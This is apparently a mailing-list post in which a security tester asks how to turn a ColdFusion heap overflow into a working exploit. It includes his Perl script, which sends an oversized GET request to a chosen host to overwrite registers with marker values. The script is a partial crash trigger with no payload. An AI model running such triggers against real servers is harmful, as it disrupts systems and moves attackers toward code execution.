ColdFusion Heap Overflow

["Gary O'leary-Steele" <garyo () sec-1 com>]

Hi all,


I need some help with a subject I have trying to get my head round for some
time. I am attempting to write exploit code for the recent coldfusion heap
overflow discovered by eeye. I don't fully understand heap overflows but
here is where I'm at.

I can control the following values within the following instruction,

mov    [ecx] ,  eax


where ecx and eax can be any value I specify. Thinking back to the .asp
chunked transfer overflow, many people talked about and implemented exploits
which overwrite the structured exception handler to gain EIP. Due to the
fact my area is stack overflows I started by trying to overwrite the saved
RET by specifying its location in [ecx] and the required value in eax.
However this just caused the program to crash in a different place and the
value in EBP was no where near where it was in the mov [ecx],eax
instruction.

I am looking for the following;

How is the exception handler overwritten ? is it in a static place etc??

Papers or advice on exploiting this type of vulnerability.

or any ideas using what I already have.

The following is the code I am currently using to overwrite the values in
ecx and eax (ecx = 0x42424242 eax=0x41414141)



#Coldfusion HEAP overflow

if (@ARGV<1) {die "\nCold Fusion Heap Overflow. \n Usage \= IP/host:Port
e.g. Perl $0 www.target.com\n";}
use Socket;
 ($host,$port)=split(/:/,@ARGV[0]);$target = inet_aton($host);
 unless($port){$port = 80;}

###################
$len1 = "A" x 1000;

$len2 = "B" x 1000;

$len3 = "C" x 1000;

$len4 = "D" x 1000;
###################


 $len5 = "E" x 119;


 $len5 = $len5 ."BBBB"."AAAA". "e" x 175 ."n" x 175;


 $len6 = "X" x 500;


 $len = $len1 .$len2 .$len3.$len4.$len5.$len6;

 $getreq = 'GET /' . $len . '.cfm' .' HTTP/1.0';


$padrequest =
$getreq.
"\r\n".
'Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword,
*/*'.
"\r\n".
'Accept-Language: en-gb'.
"\r\n".
'Accept-Encoding: gzip, deflate'.
"\r\n".
'User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Q312461;
.NET CLR 1.1.4322)'.
"\r\n".
'Host: '. $host.
"\r\n".
'Connection: Keep-Alive'.
"\r\n\r\n";




@result =sendraw($padrequest);
print $padrequest;
print length($padrequest);
#print @result;

sub sendraw {   # this saves the whole transaction anyway
 my ($pstr)=@_;
 socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
  die("Socket problems\n");
 if(connect(S,pack "SnA4x8",2,$port,$target)){
  my @in;
  select(S);      $|=1;   print $pstr;
  while(<S>){ push @in, $_;}
  select(STDOUT); close(S); return @in;
 } else { die("Can't connect...\n"); }
}


Thanks in advance.

Kind Regards
Gary
Sec-1